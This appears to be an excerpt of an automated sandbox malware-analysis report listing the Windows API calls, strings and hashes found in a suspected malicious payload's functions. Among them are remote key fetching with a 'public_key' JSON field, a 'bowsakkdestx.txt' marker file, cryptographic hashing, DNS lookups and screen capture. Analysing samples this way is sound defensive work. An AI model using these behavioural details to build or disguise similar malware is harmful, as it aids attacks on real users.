                                                                                                                              • Part of subcall function 0046C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0046C6F3
                                                                                                                              • Part of subcall function 0046C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0046C700
                                                                                                                            • _memset.LIBCMT ref: 0047E707
                                                                                                                              • Part of subcall function 0046C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C51B
                                                                                                                            • InternetOpenW.WININET ref: 0047E743
                                                                                                                            • _wcsstr.LIBCMT ref: 0047E7AE
                                                                                                                            • _memmove.LIBCMT ref: 0047E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0047E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 0047E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0047E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0047E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F6
                                                                                                                            • _strstr.LIBCMT ref: 0047EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0047EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EB7C
                                                                                                                            • _malloc.LIBCMT ref: 0047EB86
                                                                                                                            • _memset.LIBCMT ref: 0047EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0047EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EBB6
                                                                                                                            • _strstr.LIBCMT ref: 0047EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EC32
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EC3E
                                                                                                                            • lstrlenA.KERNEL32(","id":"), ref: 0047EC51
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EC6D
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EC7F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EC93
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047ECB3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047ED2A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047ED4B
                                                                                                                            • _malloc.LIBCMT ref: 0047ED55
                                                                                                                            • _memset.LIBCMT ref: 0047ED63
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0047ED7D
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047ED85
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EDA3
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EDAE
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EDD3
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EDF7
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EE05
                                                                                                                            • _free.LIBCMT ref: 0047EE15
                                                                                                                            • _free.LIBCMT ref: 0047EE22
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EF61
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EFBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                            • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 704684250-3586605218
                                                                                                                            • Opcode ID: 1b194b10bc7426e901c2b3e367cfa377b3e123586321635ed2134b25d36542fc
                                                                                                                            • Instruction ID: 6f11c0338a18957c166e7607d9db9ca5d7d4876b38839decbc162d0932cf860f
                                                                                                                            • Opcode Fuzzy Hash: 1b194b10bc7426e901c2b3e367cfa377b3e123586321635ed2134b25d36542fc
                                                                                                                            • Instruction Fuzzy Hash: 0542F471508341ABDB20EF25CC49BDF7BE8BF59308F00495EF48997292DB789509CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _wcsstr.LIBCMT ref: 0046DD8D
                                                                                                                            • _wcsstr.LIBCMT ref: 0046DDB6
                                                                                                                            • _memset.LIBCMT ref: 0046DDE4
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0046DE0A
                                                                                                                            • gethostbyname.WS2_32(00560134), ref: 0046DEA7
                                                                                                                            • inet_ntoa.WS2_32(?), ref: 0046DEC7
                                                                                                                              • Part of subcall function 004AF26C: std::exception::exception.LIBCMT ref: 004AF27F
                                                                                                                              • Part of subcall function 004AF26C: __CxxThrowException@8.LIBCMT ref: 004AF294
                                                                                                                              • Part of subcall function 004AF26C: std::exception::exception.LIBCMT ref: 004AF2AD
                                                                                                                              • Part of subcall function 004AF26C: __CxxThrowException@8.LIBCMT ref: 004AF2C2
                                                                                                                              • Part of subcall function 004AF26C: std::regex_error::regex_error.LIBCPMT ref: 004AF2D4
                                                                                                                              • Part of subcall function 004AF26C: __CxxThrowException@8.LIBCMT ref: 004AF2E2
                                                                                                                              • Part of subcall function 004AF26C: std::exception::exception.LIBCMT ref: 004AF2FB
                                                                                                                              • Part of subcall function 004AF26C: __CxxThrowException@8.LIBCMT ref: 004AF310
                                                                                                                            • _memmove.LIBCMT ref: 0046DF8C
                                                                                                                            • _memmove.LIBCMT ref: 0046DFFC
                                                                                                                            • _wcsstr.LIBCMT ref: 0046E06C
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008), ref: 0046E07E
                                                                                                                            • inet_addr.WS2_32(?), ref: 0046E0C1
                                                                                                                            • DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 0046E0E5
                                                                                                                            • inet_ntoa.WS2_32(?), ref: 0046E103
                                                                                                                            • _memmove.LIBCMT ref: 0046E33B
                                                                                                                            • _memmove.LIBCMT ref: 0046E40F
                                                                                                                            • LocalFree.KERNEL32(?), ref: 0046E495
                                                                                                                            • DnsFree.DNSAPI(?,00000001), ref: 0046E4A0
                                                                                                                            • _memset.LIBCMT ref: 0046E4BC
                                                                                                                            • lstrcpyW.KERNEL32(?,http://), ref: 0046E4D0
                                                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 0046E523
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0046E549
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0046E56A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
                                                                                                                            • String ID: http://$https://$invalid string position$vector<T> too long
                                                                                                                            • API String ID: 2428799424-3687932381
                                                                                                                            • Opcode ID: d9c6f6a286454c5cfc929def282d9f8d885f4f5217111257acb8c6d728378760
                                                                                                                            • Instruction ID: eed2ebd804f1a5c8de9b0eae4a34e40aff6987ca52d19b81323feb392217cad8
                                                                                                                            • Opcode Fuzzy Hash: d9c6f6a286454c5cfc929def282d9f8d885f4f5217111257acb8c6d728378760
                                                                                                                            • Instruction Fuzzy Hash: 1052FF74E002099FCF24DF69C8947AEBBF1BF05304F14856EE806AB342E7799945CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00471010
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00471026
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0047103B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00471051
                                                                                                                            • lstrlenA.KERNEL32(?,00000000), ref: 00471059
                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00471064
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0047107A
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00471099
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004710AB
                                                                                                                            • _memset.LIBCMT ref: 004710CA
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004710DE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004710F0
                                                                                                                            • _malloc.LIBCMT ref: 00471100
                                                                                                                            • _memset.LIBCMT ref: 0047110B
                                                                                                                            • _sprintf.LIBCMT ref: 0047112E
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0047113C
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 00471154
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0047115F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 2451520719-213608013
                                                                                                                            • Opcode ID: 8509c27c86220cb8a09026b78f004f8ad8aeb4ca66a643d1e4ad00873516d1bd
                                                                                                                            • Instruction ID: ed9111a454036d3bae026f39e1e3ec94eefc035da51b3ddd21e59bd1e15e8b86
                                                                                                                            • Opcode Fuzzy Hash: 8509c27c86220cb8a09026b78f004f8ad8aeb4ca66a643d1e4ad00873516d1bd
                                                                                                                            • Instruction Fuzzy Hash: 8751A171D40219ABDF20EBA4DC46FEFBBB8FF15704F100026FA05B6291D7795A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 00471915
                                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00471932
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471941
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471948
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00471956
                                                                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00471962
                                                                                                                            • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00471974
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 0047198B
                                                                                                                            • lstrcatW.KERNEL32(00000000,00560260), ref: 00471993
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00471999
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004719A3
                                                                                                                            • _memset.LIBCMT ref: 004719B8
                                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004719DC
                                                                                                                              • Part of subcall function 00472BA0: lstrlenW.KERNEL32(?), ref: 00472BC9
                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471A01
                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00471A04
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                            • String ID: failed with error
                                                                                                                            • API String ID: 4182478520-946485432
                                                                                                                            • Opcode ID: 594a6f484f40eec24f17f996e7afd49bfb4a994c04128af7cd9d290eeefa6c00
                                                                                                                            • Instruction ID: c3d05608617cfb244bf91d4584eea3445703bce539c14a0e9f44951c10bbaee4
                                                                                                                            • Opcode Fuzzy Hash: 594a6f484f40eec24f17f996e7afd49bfb4a994c04128af7cd9d290eeefa6c00
                                                                                                                            • Instruction Fuzzy Hash: A6212B71640214B7D7206B618C4AFAE3E78EF56B10F104055FB05B2191CE741E46EBE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471ACA
                                                                                                                              • Part of subcall function 00471AB0: DispatchMessageW.USER32(?), ref: 00471AE0
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471AEE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0046F900
                                                                                                                            • _memmove.LIBCMT ref: 0046F9EA
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0046FA51
                                                                                                                            • _memmove.LIBCMT ref: 0046FADA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 273148273-0
                                                                                                                            • Opcode ID: 624cdf5986b5d41308635619ea6854be2ecbe93387198a121f52b3649f33546a
                                                                                                                            • Instruction ID: dac4e0bd32de0cfc4598dfd4c0ef62a9dbca906edc8011c5c7cb04596156aa80
                                                                                                                            • Opcode Fuzzy Hash: 624cdf5986b5d41308635619ea6854be2ecbe93387198a121f52b3649f33546a
                                                                                                                            • Instruction Fuzzy Hash: 6652D170D00208DBCF10DFA8D985BDEB7F4BF05308F10856EE459A7251E779AA49CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0055FCA4,00000000,00000000), ref: 0046E8CE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E8E4
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0046E8F9
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E90F
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0046E928
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E93E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0046E95D
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E96F
                                                                                                                            • _memset.LIBCMT ref: 0046E98E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0046E9A2
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E9B4
                                                                                                                            • _sprintf.LIBCMT ref: 0046E9D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1084002244-213608013
                                                                                                                            • Opcode ID: 03cb073c6b533b311cb5cd655c8ec489fbcfa7bb375a4247ab325694a7f001cf
                                                                                                                            • Instruction ID: 5e26b0c935ff1b54ae210d3a0da95a3588f9070baa3643effd86ce1a62566d7c
                                                                                                                            • Opcode Fuzzy Hash: 03cb073c6b533b311cb5cd655c8ec489fbcfa7bb375a4247ab325694a7f001cf
                                                                                                                            • Instruction Fuzzy Hash: 595172B1D40209ABDF11DFA1CC46FEFBBB8EF15704F10452AF501B6181E7796A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0055FCA4,00000000), ref: 0046EB01
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB17
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0046EB2C
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB42
                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0046EB4E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB64
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0046EB83
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB95
                                                                                                                            • _memset.LIBCMT ref: 0046EBB4
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0046EBC8
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EBDA
                                                                                                                            • _sprintf.LIBCMT ref: 0046EBF4
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 0046EC44
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0046EC4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1637485200-213608013
                                                                                                                            • Opcode ID: d9f4b3e144a88820df1e53c940d5770bd3d527cae669204d3a3e48a72aba463a
                                                                                                                            • Instruction ID: ea4b1a449e4bdfdf83846fbe935d5cf7bab8ad935e32adb0a5d9a84497b4640b
                                                                                                                            • Opcode Fuzzy Hash: d9f4b3e144a88820df1e53c940d5770bd3d527cae669204d3a3e48a72aba463a
                                                                                                                            • Instruction Fuzzy Hash: 59516171D40209AADF20DBA1CC46FEFBBB8EF15704F14052AF902B7281E77969058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004B49A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,004B4B72), ref: 004B49C7
                                                                                                                              • Part of subcall function 004B49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004B49D7
                                                                                                                              • Part of subcall function 004B49A0: GetDesktopWindow.USER32 ref: 004B49FB
                                                                                                                              • Part of subcall function 004B49A0: GetProcessWindowStation.USER32(?,004B4B72), ref: 004B4A01
                                                                                                                              • Part of subcall function 004B49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004B4B72), ref: 004B4A1C
                                                                                                                              • Part of subcall function 004B49A0: GetLastError.KERNEL32(?,004B4B72), ref: 004B4A2A
                                                                                                                              • Part of subcall function 004B49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004B4B72), ref: 004B4A65
                                                                                                                              • Part of subcall function 004B49A0: _wcsstr.LIBCMT ref: 004B4A8A
                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004E2316
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004E2323
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 004E2338
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004E2341
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 004E234E
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004E235C
                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 004E236E
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004E23CA
                                                                                                                            • GetBitmapBits.GDI32(?,?,00000000), ref: 004E23D6
                                                                                                                            • SelectObject.GDI32(?,?), ref: 004E2436
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004E243D
